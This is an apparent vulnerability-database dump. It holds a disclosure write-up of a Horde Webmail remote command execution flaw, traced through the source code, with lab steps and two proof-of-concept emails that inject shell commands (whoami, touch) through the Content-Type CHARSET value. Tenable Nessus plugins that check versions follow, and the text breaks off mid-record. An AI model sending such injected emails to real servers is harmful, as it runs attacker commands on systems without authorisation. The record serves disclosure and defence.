$this->_callGpg($cmdline, 'r', null, true, true, true);\r\n/* ... */\r\n \r\n$params[\u2018charset\u2019] will be added to $cmdline array and passed to _callGpg():\r\n \r\n/* 642 */ public function _callGpg(\r\n/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false,\r\n/* 644 */ $parseable = false, $verbose = false\r\n/* 645 */ )\r\n/* 646 */ {\r\n/* \u2026 */\r\n/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options));\r\n/* \u2026 */\r\n/* 681 */ if ($mode == 'w') {\r\n/* \u2026 */\r\n/* 704 */ } elseif ($mode == 'r') {\r\n/* 705 */ if ($fp = popen($cmdline, 'r')) {\r\n/* \u2026 */\r\n \r\nOur $params[\u2018charset\u2019] will be in command line that is going to be executed.\r\n \r\ndecryptSignature() is called from decrypt() method:\r\n \r\nPath \u2013 /Horde/Crypt/Pgp.php:\r\n \r\n/* 611 */ public function decrypt($text, $params = array())\r\n/* 612 */ {\r\n/* 613 */ switch (isset($params['type']) ? $params['type'] : false) {\r\n/* 614 */ case 'detached-signature':\r\n/* 615 */ case 'signature':\r\n/* 616 */ /* Check for required parameters. */\r\n/* 617 */ if (!isset($params['pubkey'])) {\r\n/* 618 */ throw new InvalidArgumentException(\r\n/* 619 */ 'A public PGP key is required to verify a signed message.'\r\n/* 620 */ );\r\n/* 621 */ }\r\n/* 622 */ if (($params['type'] === 'detached-signature') &&\r\n/* 623 */ !isset($params['signature'])) {\r\n/* 624 */ throw new InvalidArgumentException(\r\n/* 625 */ 'The detached PGP signature block is required to verify the\r\nsigned message.'\r\n/* 626 */ );\r\n/* 627 */ }\r\n/* 628 */\r\n/* 629 */ $func = 'decryptSignature';\r\n/* 630 */ break;\r\n/* ... */\r\n/* 650 */ $this->_initDrivers();\r\n/* 651 */\r\n/* 652 */ foreach ($this->_backends as $val) {\r\n/* 653 */ try {\r\n/* 654 */ return $val->$func($text, $params);\r\n/* 655 */ } catch (Horde_Crypt_Exception $e) {}\r\n/* 656 */ }\r\n/* ... */\r\n \r\ndecrypt() with needed parameters is used in verifySignature():\r\n \r\nPath \u2013 /imp/lib/Crypt/Pgp.php\r\n \r\n/* 339 */ public function verifySignature($text, $address, $signature = '',\r\n/* 340 */ $charset = null)\r\n/* 341 */ {\r\n/* 342 */ if (!empty($signature)) {\r\n/* 343 */ $packet_info = $this->pgpPacketInformation($signature);\r\n/* 344 */ if (isset($packet_info['keyid'])) {\r\n/* 345 */ $keyid = $packet_info['keyid'];\r\n/* 346 */ }\r\n/* 347 */ }\r\n/* 349 */ if (!isset($keyid)) {\r\n/* 350 */ $keyid = $this->getSignersKeyID($text);\r\n/* 351 */ }\r\n/* 353 */ /* Get key ID of key. */\r\n/* 354 */ $public_key = $this->getPublicKey($address, array('keyid' => $keyid));\r\n/* 356 */ if (empty($signature)) {\r\n/* 357 */ $options = array('type' => 'signature');\r\n/* 358 */ } else {\r\n/* 359 */ $options = array('type' => 'detached-signature', 'signature'\r\n=> $signature);\r\n/* 360 */ }\r\n/* 361 */ $options['pubkey'] = $public_key;\r\n/* 363 */ if (!empty($charset)) {\r\n/* 364 */ $options['charset'] = $charset;\r\n/* 365 */ }\r\n/* 369 */ return $this->decrypt($text, $options);\r\n/* 370 */ }\r\n \r\nverifySignature() is called from _outputPGPSigned():\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Pgp.php\r\n \r\n/* 387 */ protected function _outputPGPSigned()\r\n/* 388 */ {\r\n/* 389 */ global $conf, $injector, $prefs, $registry, $session;\r\n/* 390 */\r\n/* 391 */ $partlist = array_keys($this->_mimepart->contentTypeMap());\r\n/* 392 */ $base_id = reset($partlist);\r\n/* 393 */ $signed_id = next($partlist);\r\n/* 394 */ $sig_id = Horde_Mime::mimeIdArithmetic($signed_id, 'next');\r\n/* 395 */\r\n/* 396 */ if (!$prefs->getValue('use_pgp') || empty($conf['gnupg']['path'])) {\r\n/* 397 */ return array(\r\n/* 398 */ $sig_id => null\r\n/* 399 */ );\r\n/* 400 */ }\r\n/* ... */\r\n/* 417 */ if ($prefs->getValue('pgp_verify') ||\r\n/* 418 */ $injector->getInstance('Horde_Variables')->pgp_verify_msg) {\r\n/* 419 */ $imp_contents = $this->getConfigParam('imp_contents');\r\n/* 420 */ $sig_part = $imp_contents->getMIMEPart($sig_id);\r\n/* ... */\r\n/* 433 */ try {\r\n/* 434 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp');\r\n/* 435 */ if ($sig_raw =\r\n$sig_part->getMetadata(Horde_Crypt_Pgp_Parse::SIG_RAW)) {\r\n/* 436 */ $sig_result = $imp_pgp->verifySignature($sig_raw,\r\n$this->_getSender()->bare_address, null, $sig_part-\r\n> getMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET));\r\n/* ... */\r\n \r\nAnd it is used in _renderInline():\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Pgp.php\r\n \r\n/* 134 */ protected function _renderInline()\r\n/* 135 */ {\r\n/* 136 */ $id = $this->_mimepart->getMimeId();\r\n/* 138 */ switch ($this->_mimepart->getType()) {\r\n/* ... */\r\n/* 142 */ case 'multipart/signed':\r\n/* 143 */ return $this->_outputPGPSigned();\r\n \r\nLet\u2019s go back to _outputPGPSigned() method. We can see a few\r\nrequirements before the needed call:\r\n \r\n$conf[\u2018gnupg\u2019][\u2018path\u2019] should be not empty. This value can be edited\r\nonly by admin(if he/she wants to allow users to use GPG feature he/she\r\nneeds to define value for this config).\r\nCurrent user has enabled \u201cuse_pgp\u201d feature in his preferences\r\nCurrent user has enabled \u201cpgp_verify\u201d feature in his preferences\r\nCurrent user has enabled \u201cpgp_verify\u201d feature in his preferences\r\n \r\nAlso we see that our charset value is taken from $sig_part ->\r\ngetMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET)\r\n \r\nOur value will be stored during parsing of PGP parts:\r\n \r\nPath \u2013 /Horde/Crypt/Pgp/Parse.php\r\n \r\n/* 150 */ public function parseToPart($text, $charset = 'UTF-8')\r\n/* 151 */ {\r\n/* 152 */ $parts = $this->parse($text);\r\n/* ... */\r\n/* 162 */ while (list(,$val) = each($parts)) {\r\n/* 163 */ switch ($val['type']) {\r\n/* ... */\r\n/* 200 */ case self::ARMOR_SIGNED_MESSAGE:\r\n/* 201 */ if ((list(,$sig) = each($parts)) &&\r\n/* 202 */ ($sig['type'] == self::ARMOR_SIGNATURE)) {\r\n/* 203 */ $part = new Horde_Mime_Part();\r\n/* 204 */ $part->setType('multipart/signed');\r\n/* 205 */ // TODO: add micalg parameter\r\n/* 206 */ $part->setContentTypeParameter('protocol',\r\n'application/pgp-signature');\r\n/* 207 */\r\n/* 208 */ $part1 = new Horde_Mime_Part();\r\n/* 209 */ $part1->setType('text/plain');\r\n/* 210 */ $part1->setCharset($charset);\r\n/* 211 */\r\n/* 212 */ $part1_data = implode(\"\\n\", $val['data']);\r\n/* 213 */ $part1->setContents(substr($part1_data, strpos($part1_data,\r\n\"\\n\\n\") + 2));\r\n/* 214 */\r\n/* 215 */ $part2 = new Horde_Mime_Part();\r\n/* 216 */\r\n/* 217 */ $part2->setType('application/pgp-signature');\r\n/* 218 */ $part2->setContents(implode(\"\\n\", $sig['data']));\r\n/* 219 */\r\n/* 220 */ $part2->setMetadata(self::SIG_CHARSET, $charset);\r\n/* 221 */ $part2->setMetadata(self::SIG_RAW, implode(\"\\n\",\r\n$val['data']) . \"\\n\" . implode(\"\\n\", $sig['data']));\r\n/* 222 */\r\n/* 223 */ $part->addPart($part1);\r\n/* 224 */ $part->addPart($part2);\r\n/* 225 */ $new_part->addPart($part);\r\n/* 226 */\r\n/* 227 */ next($parts);\r\n/* 228 */ }\r\n/* 229 */ }\r\n/* 230 */ }\r\n/* 231 */\r\n/* 232 */ return $new_part;\r\n/* 233 */ }\r\n \r\nIt is called from _parsePGP():\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Plain.php\r\n \r\n\u00d7\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n/* 239 */ protected function _parsePGP()\r\n/* 240 */ {\r\n/* 241 */ $part =\r\n$GLOBALS['injector']->getInstance('Horde_Crypt_Pgp_Parse')->parseToPart(\r\n/* 242 */ new Horde_Stream_Existing(array(\r\n/* 243 */ 'stream' => $this->_mimepart->getContents(array('stream' => true))\r\n/* 244 */ )),\r\n/* 245 */ $this->_mimepart->getCharset()\r\n/* 246 */ );\r\n \r\nOur charset value is taken from CHARSET attribute of Content-Type\r\nheader of parent MIMEpart.\r\n \r\n_parsePGP() is used in _getEmbeddedMimeParts() method and from Horde\r\nWebmail ver 5.2.0 it looks like:\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Plain.php\r\n \r\n/* 222 */ protected function _getEmbeddedMimeParts()\r\n/* 223 */ {\r\n/* 224 */ $ret = $this->getConfigParam('pgp_inline')\r\n/* 225 */ ? $this->_parsePGP()\r\n/* 226 */ : null;\r\n \r\nWe can see an additional requirement \u2013 our function will be called\r\nonly if \u2018pgp_inline\u2018 config parameter is \u201ctrue\u201d. It is defined in:\r\n \r\nPath \u2013 /imp/config/mime_drivers.php\r\n \r\n/* 37 */ /* Scans the text for inline PGP data. If true, will strip this data\r\n/* 38 */ * out of the output (and, if PGP is active, will display the\r\n/* 39 */ * results of the PGP action). */\r\n/* 40 */ 'pgp_inline' => false\r\n \r\nDefault value is false, so the major part of Horde servers is not\r\nvulnerable and our attack is relevant only if an admin manually has\r\nchanged this line to \u2018pgp_inline\u2018 => true.\r\n \r\nBut in older versions (before 5.2.0) the code of\r\n_getEmbeddedMimeParts() is a bit different:\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Plain.php\r\n \r\n/* 227 */ protected function _getEmbeddedMimeParts()\r\n/* 228 */ {\r\n/* 229 */ $ret = null;\r\n/* 230 */\r\n/* 231 */ if (!empty($GLOBALS['conf']['gnupg']['path']) &&\r\n/* 232 */ $GLOBALS['prefs']->getValue('pgp_scan_body')) {\r\n/* 233 */ $ret = $this->_parsePGP();\r\n/* 234 */ }\r\n \r\nSo instead of requirement to have config parameter we have requirement\r\nof \u2018pgp_scan_body\u2018 Preference of current user. And it is more likely\r\nto find a victim with needed preferences. We saw where our injected\r\ncommand is executed and from where and when it is taken\r\n \r\nDuring rendering of massage we:\r\n \r\nWill parse PGP values:\r\n \r\n#0 IMP_Mime_Viewer_Plain->_parsePGP() called at\r\n[/imp/lib/Mime/Viewer/Plain.php:225]\r\n#1 IMP_Mime_Viewer_Plain->_getEmbeddedMimeParts() called at\r\n[/Horde/Mime/Viewer/Base.php:298]\r\n#2 Horde_Mime_Viewer_Base->getEmbeddedMimeParts() called at\r\n[/imp/lib/Contents.php:1114]\r\n#3 IMP_Contents->_buildMessage() called at [/imp/lib/Contents.php:1186]\r\n#4 IMP_Contents->getContentTypeMap() called at [/imp/lib/Contents.php:1423]\r\n#5 IMP_Contents->getInlineOutput() called at\r\n[/imp/lib/Ajax/Application/ShowMessage.php:296]\r\n \r\nWill use them in:\r\n \r\n#0 IMP_Mime_Viewer_Plain->_parsePGP() called at\r\n[/imp/lib/Mime/Viewer/Plain.php:225]\r\n#0 IMP_Mime_Viewer_Pgp->_renderInline() called at\r\n[/Horde/Mime/Viewer/Base.php:156]\r\n#1 Horde_Mime_Viewer_Base->render() called at [/Horde/Mime/Viewer/Base.php:207]\r\n#2 Horde_Mime_Viewer_Base->_renderInline() called at\r\n[/Horde/Mime/Viewer/Base.php:156]\r\n#3 Horde_Mime_Viewer_Base->render() called at [/imp/lib/Contents.php:654]\r\n#4 IMP_Contents->renderMIMEPart() called at [/imp/lib/Contents.php:1462]\r\n#5 IMP_Contents->getInlineOutput() called at\r\n[/imp/lib/Ajax/Application/ShowMessage.php:296]]\r\n \r\nIn conclusions:\r\n \r\nIf Horde server has vulnerable configuration:\r\n \r\nEnabled \u201cGnuPG feature\u201d (there is path to gpg binary in\r\n$conf[gnupg][path] setting)\r\nOnly for ver 5.2.0 and newer: \u2018pgp_inline\u2019 => true, in\r\n/imp/config/mime_drivers.php\r\n \r\nAnd the victim has checked the next checkbox in his/her preferences (\r\n\u201cPGP Configure PGP encryption support.\u201d in Prefferences->Mail) :\r\n \r\n\u201cEnable PGP functionality\u201d\r\n\u201cShould PGP signed messages be automatically verified when viewed?\u201d if\r\nit is not checked our command will be executed when the victim clicks\r\non the link \u201cClick HERE to verify the message.\u201d\r\nFor versions before 5.2.0: \u201cShould the body of plaintext message be\r\nscanned for PGP data\u201d\r\n \r\nAn attacker can create email with PGP data, put desired command into\r\nCHARSET attribute of ContentType header, and this command will be\r\nexecuted on Horde server when the victim opens this email.\r\n \r\nProof of Concept \u2013 Remote Code Execution\r\n \r\nFor Proof of Concept we can use preconfigured image of Horde server\r\nfrom Bitnami (Bitnami \u2013 \u201cEasy to use cloud images, containers, and VMs\r\nthat work on any platform\u201d):\r\n \r\nhttps://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova\r\n \r\nStep 1 \u2013 Login as admin (by default user:bitnami) and go to\r\nAdministration -> Configuration and choose Horde (horde). Open GnuPG\r\ntab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click\r\n\u201cGenerate Horde Configuration\u201c:\r\n \r\nNow we have enabled GPG feature on our server and we can login as\r\nregular user and try to execute desired commands. But Bitnami image\r\ndoes not have installed and configured Mail server so we need to use\r\nexternal one or install it on local machine.\r\n \r\nWe will use gmail account (to be able to login to it from Horde I had\r\nto change Gmail account setting Allow less secure apps: ON).\r\n \r\nTo use external Mail server we need to change the next setting:\r\n\u201cAdministrator Panel\u201d -> \u201cConfiguration\u201d -> \u201cHorde\u201d ->\r\n\u201cAuthentication\u201d\r\n \r\nConfigure the application authentication ($conf[auth][driver]) \u2013\r\nchange this option to \u201cLet a Horde application handle authentication\u201d\r\nand click \u201cGenerate Horde Configuration\u201d.\r\n \r\nIf we have Horde Webmail ver 5.2.0 or newer we need to edit\r\n/imp/config/mime_drivers.php file. Login to the console of bitnami\r\nimage (default bitnami:bitnami) and run the next command:\r\n \r\nsudo nano /opt/bitnami/apps/horde/htdocs/imp/config/mime_drivers.php\r\n \r\nChange the line: \u201c\u2018pgp_inline\u2019 => false\u201d to \u201c\u2018pgp_inline\u2019 => true\u201d and\r\nsave the changes.\r\n \r\nStep 2 \u2013 Logout and login with your gmail account.\r\n \r\nStep 3 \u2013 Go to Preferences -> Mail and click on PGP link:\r\n \r\nCheck Enable PGP functionality checkbox and click \u201cSave\u201d\r\nCheck Should PGP signed messages be automatically verified when viewed checkbox\r\nFor versions before 5.2.0 check \u201cShould the body of plain-text message\r\nbe scanned for PGP data\u201d checkbox Click \u201cSave\u201d\r\n \r\nFor version before 5.2.0:\r\n \r\nStep 4 \u2013 Go to the Mail, take any mail folder (for example Drafts),\r\nand chose \u201cImport\u201d item from context menu and import attack_whoami.eml\r\nfile (in the end of this blog).\r\n \r\nClick on the imported email:\r\n \r\nOur Horde serve is launched under daemon user\r\n \r\nStep 5 \u2013 We can do the same with attack_touch.eml (in the end of this\r\nblog) file (import it and click on the new mail) and check /tmp\r\nfolder:\r\n \r\nattack_touch.eml\r\n \r\nDate: Fri, 04 Nov 2016 16:04:19 +0000\r\nMessage-ID: <[email\u00a0protected]>\r\nFrom: Donald Trump <[email\u00a0protected]>\r\nTo: [email\u00a0protected]\r\nSubject: PGP_INLine_touch_tmp_youarevuln\r\nX-IMP-Draft: Yes\r\nContent-Type: text/plain; CHARSET=\"US-ASCII`touch /tmp/youarevuln`\";\r\nformat=flowed; DelSp=Yes\r\nMIME-Version: 1.0\r\nContent-Disposition: inline\r\n \r\n \r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nThis is a sample of a clear signed message.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n \r\niQCVAwUBMoSCcM4T3nOFCCzVAQF4aAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF\r\nU5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh\r\nDztuhjzJMEzwtm8KTKBnF/LJ9X05pSQUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz\r\nCvynscaD+wA=\r\n=Xb9n\r\n-----END PGP SIGNATURE-----\r\n \r\nattack_whoami.eml\r\n \r\nDate: Fri, 04 Nov 2016 16:04:19 +0000\r\nMessage-ID: <[email\u00a0protected]>\r\nFrom: Donald Trump <[email\u00a0protected]>\r\nTo: [email\u00a0protected]\r\nSubject: PGP_INLine_whoami\r\nX-IMP-Draft: Yes\r\nContent-Type: text/plain; CHARSET=US-ASCII`whoami`; format=flowed; DelSp=Yes\r\nMIME-Version: 1.0\r\nContent-Disposition: inline\r\n \r\n \r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nThis is a sample of a clear signed message.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n \r\niQCVAwUBMoSCcM4T3nOFCCzVAQFJaAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF\r\nU5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh\r\nDztuhjzJMEzwtm8KTKBnF/LJ9X05pSsUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz\r\nCvynscaD+wA=\r\n=Xb9n\r\n-----END PGP SIGNATURE-----\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27576"}], "nessus": [{"lastseen": "2019-02-21T01:42:15", "bulletinFamily": "scanner", "description": "The version of Apache ActiveMQ running on the remote host is 5.x prior to 5.15.5. It is, therefore, affected by multiple vulnerabilities.", "modified": "2018-11-28T00:00:00", "id": "ACTIVEMQ_5_15_5.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=112192", "published": "2018-08-30T00:00:00", "title": "Apache ActiveMQ 5.x < 5.15.5 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112192);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/28 22:47:41\");\n\n script_cve_id(\n \"CVE-2012-0881\",\n \"CVE-2014-0114\",\n \"CVE-2015-5182\",\n \"CVE-2016-3092\",\n \"CVE-2016-5425\",\n \"CVE-2016-6325\",\n \"CVE-2016-8735\",\n \"CVE-2018-7489\",\n \"CVE-2018-8006\"\n );\n script_bugtraq_id(\n 68753,\n 105156,\n 67121,\n 91453,\n 93472,\n 93478,\n 94463,\n 103203\n );\n\n script_name(english:\"Apache ActiveMQ 5.x < 5.15.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of ActiveMQ.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\n vulnerabilities.\");\nscript_set_attribute(attribute:\"description\", value:\n\"The version of Apache ActiveMQ running on the remote host is 5.x prior\nto 5.15.5. It is, therefore, affected by multiple vulnerabilities.\n\");\n script_set_attribute(attribute:\"see_also\", value:\"http://activemq.apache.org/activemq-5155-release.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache ActiveMQ version 5.15.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3092\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:activemq\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"activemq_web_console_detect.nasl\");\n script_require_keys(\"installed_sw/ActiveMQ\");\n script_require_ports(\"Services/www\", 8161);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\napp = 'ActiveMQ';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8161);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n { \"min_version\" : \"5.0.0\", \"max_version\" : \"5.15.4\", \"fixed_version\" : \"5.15.5\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE, xsrf:TRUE});\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:38:32", "bulletinFamily": "scanner", "description": "The version of Oracle WebCenter Sites running on the remote host is affected by an unspecified flaw in the Sites component (formerly FatWire Content Server) that allows an remote attacker to impact confidentiality and integrity. Note that this issue only applies to versions 11.1.1.8.0, 12.2.1.2.0,and 12.2.1.3.0.", "modified": "2018-11-15T00:00:00", "id": "ORACLE_WEBCENTER_SITES_APR_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=109209", "published": "2018-04-20T00:00:00", "title": "Oracle WebCenter Sites Remote Vulnerability (April 2018 CPU)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109209);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2016-3092\",\"CVE-2017-12617\",\"CVE-2018-2791\");\n script_bugtraq_id(91453,100954,103800);\n\n script_name(english:\"Oracle WebCenter Sites Remote Vulnerability (April 2018 CPU)\");\n script_summary(english:\"Checks the version of Oracle WebCenter Sites.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by a remote\nsecurity vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebCenter Sites running on the remote host is\naffected by an unspecified flaw in the Sites component (formerly\nFatWire Content Server) that allows an remote attacker to impact\nconfidentiality and integrity. Note that this issue only applies\nto versions 11.1.1.8.0, 12.2.1.2.0,and 12.2.1.3.0.\"\n );\n #https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e39ef65\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_webcenter_sites_installed.nbin\");\n script_require_ports(\"Services/www\", 7001);\n script_require_keys(\"SMB/WebCenter_Sites/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\n\nport = kb_smb_transport();\n\nget_kb_item_or_exit('SMB/WebCenter_Sites/Installed');\n\nversions = get_kb_list('SMB/WebCenter_Sites/*/Version');\nif (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.');\n\nreport = '';\n\nforeach key (keys(versions))\n{\n fix = '';\n\n version = versions[key];\n revision = get_kb_item(key - '/Version' + '/Revision');\n path = get_kb_item(key - '/Version' + '/Path');\n\n if (isnull(version) || isnull(revision)) continue;\n\n # Patch 27589552 - 11.1.1.8.0 < Revision 184362 \n if (version =~ \"^11\\.1\\.1\\.8\\.0$\" && revision < 184362)\n fix = '\\n Fixed revision : 184362' +\n '\\n Required patch : 27589552';\n\n# Pending 12.x Fusion Middleware and WebCenter Sites detection fixes\n#\n# # Patch 25806943 - 12.2.1.1.0 < Revision 170415\n# if (version =~ \"^12\\.2\\.1\\.1\\.0$\" && revision < 170415)\n# fix = '\\n Fixed revision : 170415' +\n# '\\n Required patch : 25806943';\n#\n# # Patch 25806946 - 12.2.1.2.0 < Revision 170415\n# if (version =~ \"^12\\.2\\.1\\.2\\.0$\" && revision < 170415)\n# fix = '\\n Fixed revision : 170415' +\n# '\\n Required patch : 25806946';\n#\n if (fix != '')\n {\n if (!isnull(path)) report += '\\n Path : ' + path;\n report += '\\n Version : ' + version +\n '\\n Revision : ' + revision +\n fix + '\\n';\n }\n}\n\nif (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Oracle WebCenter Sites\");\n\n\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:31:42", "bulletinFamily": "scanner", "description": "An update for gstreamer1-plugins-bad-free is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-bad-free package contains a collection of plug-ins for GStreamer.\n\nSecurity Fix(es) :\n\n* An integer overflow flaw, leading to a heap-based buffer overflow, was found in GStreamer's VMware VMnc video file format decoding plug-in. A remote attacker could use this flaw to cause an application using GStreamer to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2016-9445)\n\n* Multiple flaws were discovered in GStreamer's H.264 and MPEG-TS plug-ins. A remote attacker could use these flaws to cause an application using GStreamer to crash. (CVE-2016-9809, CVE-2016-9812, CVE-2016-9813)\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-20T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0021.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101404", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : gstreamer1-plugins-bad-free / etc (VZLSA-2017-0021)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101404);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\n \"CVE-2016-9445\",\n \"CVE-2016-9809\",\n \"CVE-2016-9812\",\n \"CVE-2016-9813\"\n );\n\n script_name(english:\"Virtuozzo 7 : gstreamer1-plugins-bad-free / etc (VZLSA-2017-0021)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for gstreamer1-plugins-bad-free is now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGStreamer is a streaming media framework based on graphs of filters\nwhich operate on media data. The gstreamer1-plugins-bad-free package\ncontains a collection of plug-ins for GStreamer.\n\nSecurity Fix(es) :\n\n* An integer overflow flaw, leading to a heap-based buffer overflow,\nwas found in GStreamer's VMware VMnc video file format decoding\nplug-in. A remote attacker could use this flaw to cause an application\nusing GStreamer to crash or, potentially, execute arbitrary code with\nthe privileges of the user running the application. 